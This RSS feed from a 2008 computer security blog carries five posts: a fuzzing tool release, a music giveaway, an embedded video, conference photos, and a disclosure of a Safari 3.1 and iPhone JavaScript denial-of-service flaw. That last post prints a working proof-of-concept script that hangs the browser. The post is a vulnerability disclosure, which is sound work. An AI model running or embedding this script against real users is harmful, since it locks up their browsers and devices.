<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Security-Protocols</title>
	<atom:link href="http://security-protocols.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://security-protocols.com</link>
	<description>Computer Security Research</description>
	<pubDate>Wed, 07 May 2008 20:09:50 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.5</generator>
	<language>en</language>
			<item>
		<title>Tmin fuzzing test case optimizer released</title>
		<link>http://security-protocols.com/2008/05/06/tmin-fuzzing-test-case-optimizer-released/</link>
		<comments>http://security-protocols.com/2008/05/06/tmin-fuzzing-test-case-optimizer-released/#comments</comments>
		<pubDate>Tue, 06 May 2008 23:17:47 +0000</pubDate>
		<dc:creator>Tom Ferris</dc:creator>
		
		<category><![CDATA[Fuzzers]]></category>

		<category><![CDATA[fuzzer]]></category>

		<category><![CDATA[fuzzing]]></category>

		<category><![CDATA[google security]]></category>

		<category><![CDATA[lcamtuf]]></category>

		<category><![CDATA[mz]]></category>

		<category><![CDATA[optimizer]]></category>

		<category><![CDATA[test case]]></category>

		<category><![CDATA[tmin]]></category>

		<guid isPermaLink="false">http://security-protocols.com/?p=186</guid>
		<description><![CDATA[Tmin is a quick and simple tool to minimize the size and syntax of complex test cases in automated security testing. 
The tool is somewhat related to delta, which is a more featured general purpose optimizer but is meant specifically for dealing with unknown or complex data formats (without the need to tokenize and re-serialize [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://code.google.com/p/tmin" target="_blank">Tmin</a> is a quick and simple tool to minimize the size and syntax of complex test cases in automated security testing. </p>
<p>The tool is somewhat related to delta, which is a more featured general purpose optimizer but is meant specifically for dealing with unknown or complex data formats (without the need to tokenize and re-serialize testcases), for hands-off detection of security fault conditions, and for easy integration with UI testing harnesses.</p>
<p>tmin is also capable of reducing the complexity of alphabets used on datasets that cannot be further trimmed down in size.</p>
<p>Below is an example run of tmin:<br />
<code><br />
$ cat testcase.in<br />
This is a lengthy and annoying hello world testcase.</p>
<p>$ cat testme.sh<br />
#!/bin/bash</p>
<p>grep "el..*wo" || exit 0<br />
exit 1</p>
<p>$ ../tmin -x ./testme.sh<br />
tmin - complex testcase minimizer, version 0.03-beta (lcamtuf@google.com)<br />
[*] Stage 0: loading 'testcase.in' and validating fault condition...<br />
[*] Stage 1: recursive truncation (round 1, input = 53/53)<br />
[*] Stage 1: recursive truncation (round 2, input = 27/53)<br />
[*] Stage 1: recursive truncation (round 3, input = 14/53)<br />
[*] Stage 1: recursive truncation (round 4, input = 10/53)<br />
[*] Stage 1: recursive truncation (round 5, input = 8/53)<br />
[*] Stage 1: recursive truncation (round 6, input = 7/53)<br />
[*] Stage 2: block skipping (round 1, input = 7/53)<br />
[*] Stage 2: block skipping (round 2, input = 6/53)<br />
[*] Stage 2: block skipping (round 3, input = 5/53)<br />
[*] Stage 3: alphabet normalization (round 1, charset = 5/5)<br />
[*] Stage 3: alphabet normalization (round 2, charset = 5/5)<br />
[*] Stage 4: character normalization (round 1, characters = 4/5)<br />
[*] All done - writing output to 'testcase.small'...</p>
<p>== Final statistics==<br />
Original size : 53 bytes<br />
Optimized size : 5 bytes (-90.57%)<br />
Chars replaced : 1 (1.89%)<br />
   Efficiency : 9 good / 49 bad<br />
 Round counts : 1:6 2:3 3:2 4:1</p>
<p>$ cat testcase.small<br />
el0wo<br />
</code></p>
<p>Download:<br />
<a href="http://code.google.com/p/tmin">http://code.google.com/p/tmin</a></p>
<p>Usage:<br />
<a href="http://code.google.com/p/tmin/wiki/TminManual">http://code.google.com/p/tmin/wiki/TminManual</a></p>
]]></content:encoded>
			<wfw:commentRss>http://security-protocols.com/2008/05/06/tmin-fuzzing-test-case-optimizer-released/feed/</wfw:commentRss>
		</item>
		<item>
		<title>NiN Gives Away Full Length Album - The Slip</title>
		<link>http://security-protocols.com/2008/05/05/nin-gives-away-full-length-album-the-slip/</link>
		<comments>http://security-protocols.com/2008/05/05/nin-gives-away-full-length-album-the-slip/#comments</comments>
		<pubDate>Mon, 05 May 2008 15:09:06 +0000</pubDate>
		<dc:creator>Tom Ferris</dc:creator>
		
		<category><![CDATA[Misc]]></category>

		<category><![CDATA[News]]></category>

		<category><![CDATA[Free Download]]></category>

		<category><![CDATA[Music]]></category>

		<category><![CDATA[NiN]]></category>

		<category><![CDATA[The Slip]]></category>

		<guid isPermaLink="false">http://security-protocols.com/?p=185</guid>
		<description><![CDATA[
Nine Inch Nails is giving away their new album for free entitled The Slip, exclusively from NiN.com. The album is available in a variety of formats including high-quality MP3, FLAC and or M4A lossless at CD quality and even higher-than-CD quality 24/96 WAVE.
Click on the link below to your copy:
http://dl.nin.com/theslip/signup
]]></description>
			<content:encoded><![CDATA[<p><img src="http://security-protocols.com/wp-content/uploads/2008/05/theslip.gif" alt="" title="NiN theslip" width="142" height="64" class="aligncenter size-full wp-image-184" /></p>
<p>Nine Inch Nails is giving away their new album for free entitled The Slip, exclusively from NiN.com. The album is available in a variety of formats including high-quality MP3, FLAC and or M4A lossless at CD quality and even higher-than-CD quality 24/96 WAVE.</p>
<p>Click on the link below to your copy:</p>
<p><a href="http://dl.nin.com/theslip/signup">http://dl.nin.com/theslip/signup</a></p>
]]></content:encoded>
			<wfw:commentRss>http://security-protocols.com/2008/05/05/nin-gives-away-full-length-album-the-slip/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Fortify: The New Face of Cybercrime</title>
		<link>http://security-protocols.com/2008/04/30/fortify-the-new-face-of-cybercrime/</link>
		<comments>http://security-protocols.com/2008/04/30/fortify-the-new-face-of-cybercrime/#comments</comments>
		<pubDate>Wed, 30 Apr 2008 15:24:50 +0000</pubDate>
		<dc:creator>Tom Ferris</dc:creator>
		
		<category><![CDATA[Misc]]></category>

		<category><![CDATA[Cybercrime]]></category>

		<category><![CDATA[Fortify]]></category>

		<category><![CDATA[Hacking]]></category>

		<category><![CDATA[Video]]></category>

		<guid isPermaLink="false">http://security-protocols.com/?p=182</guid>
		<description><![CDATA[
]]></description>
			<content:encoded><![CDATA[<p><object width="425" height="355"><param name="movie" value="http://www.youtube.com/v/-5zxOLZ5jXM&#038;hl=en"></param><param name="wmode" value="transparent"></param><embed src="http://www.youtube.com/v/-5zxOLZ5jXM&#038;hl=en" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://security-protocols.com/2008/04/30/fortify-the-new-face-of-cybercrime/feed/</wfw:commentRss>
		</item>
		<item>
		<title>CanSecWest 2008 Photos</title>
		<link>http://security-protocols.com/2008/04/04/cansecwest-2008-photos/</link>
		<comments>http://security-protocols.com/2008/04/04/cansecwest-2008-photos/#comments</comments>
		<pubDate>Sat, 05 Apr 2008 02:12:43 +0000</pubDate>
		<dc:creator>Tom Ferris</dc:creator>
		
		<category><![CDATA[Misc]]></category>

		<category><![CDATA[Photos]]></category>

		<guid isPermaLink="false">http://security-protocols.com/2008/04/04/cansecwest-2008-photos/</guid>
		<description><![CDATA[I finally got around to posting the shots I took while I was in Vancouver, British Columbia for CanSecWest 2008.  This was my first time going to CanSecWest and I must say it was a great conference.  It doesn&#8217;t have all of that hype and BS like BlackHat does.. Ill defiantly be going [...]]]></description>
			<content:encoded><![CDATA[<p>I finally got around to posting the shots I took while I was in Vancouver, British Columbia for <a href="http://cansecwest.com/" target="_blank">CanSecWest</a> 2008.  This was my first time going to CanSecWest and I must say it was a great conference.  It doesn&#8217;t have all of that hype and BS like BlackHat does.. Ill defiantly be going next year.</p>
<p><a href="http://flickr.com/photos/tomferris/sets/72157604376917452/" title="CanSecWest 2008 - Vancouver, BC by tom ferris, on Flickr"><img src="http://farm3.static.flickr.com/2411/2386917337_2c2719974f_m.jpg" width="240" height="160" alt="CanSecWest 2008 - Vancouver, BC" /></a></p>
<p>Full photo set here:<br />
<a href="http://flickr.com/photos/tomferris/sets/72157604376917452/" target="_blank">http://flickr.com/photos/tomferris/sets/72157604376917452/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://security-protocols.com/2008/04/04/cansecwest-2008-photos/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Safari 3.1 JavaScript DoS Released</title>
		<link>http://security-protocols.com/2008/03/19/safari-31-javascript-dos-released/</link>
		<comments>http://security-protocols.com/2008/03/19/safari-31-javascript-dos-released/#comments</comments>
		<pubDate>Thu, 20 Mar 2008 02:48:48 +0000</pubDate>
		<dc:creator>Tom Ferris</dc:creator>
		
		<category><![CDATA[Apple]]></category>

		<category><![CDATA[Flaws]]></category>

		<category><![CDATA[iPhone]]></category>

		<guid isPermaLink="false">http://security-protocols.com/2008/03/19/safari-31-javascript-dos-released/</guid>
		<description><![CDATA[Georgi Guninski has discovered a denial of service vulnerability in Safari 3.1 which causes the browser to hang, and not crash.  This DoS also affects iPhones running firmware version 1.1.4 and, all other earlier versions.
When visiting a site with the malformed JavaScript, the iPhone will lock up becoming causing the user to have to [...]]]></description>
			<content:encoded><![CDATA[<p>Georgi Guninski has discovered a denial of service vulnerability in Safari 3.1 which causes the browser to hang, and not crash.  This DoS also affects iPhones running firmware version 1.1.4 and, all other earlier versions.</p>
<p>When visiting a site with the malformed JavaScript, the iPhone will lock up becoming causing the user to have to reboot the phone.  The current workaround is to disable JavaScript on your iPhone and or iPod touch.</p>
<p>Below is the source of PoC which will trigger the hang (not a crash).<br />
<code><br />
        Copyright Georgi Guninski<br />
        <br />
        Cannot be used in vulnerability databases<br />
        <br />
        Especially securityfocus/mitre/cve/cert<br />
        SCRIPT<br />
        var s=String.fromCharCode(257);<br />
        var ki=&#8221;";<br />
        var me=&#8221;";<br />
        for(i=0;i<1024;i++)<br />
        {ki=ki+s;}<br />
        for(i=0;i<1024;i++)<br />
        {me=me+ki;}<br />
        var ov=s;<br />
        for(i=0;i<28;i++) ov += ov;<br />
        for(i=0;i<88;i++) ov += me;</p>
<p>        alert("done generating");<br />
        var fuckbill=escape(ov);<br />
        alert("done escape");<br />
        alert(fuckbill);<br />
        SCRIPT<br />
</code></p>
]]></content:encoded>
			<wfw:commentRss>http://security-protocols.com/2008/03/19/safari-31-javascript-dos-released/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
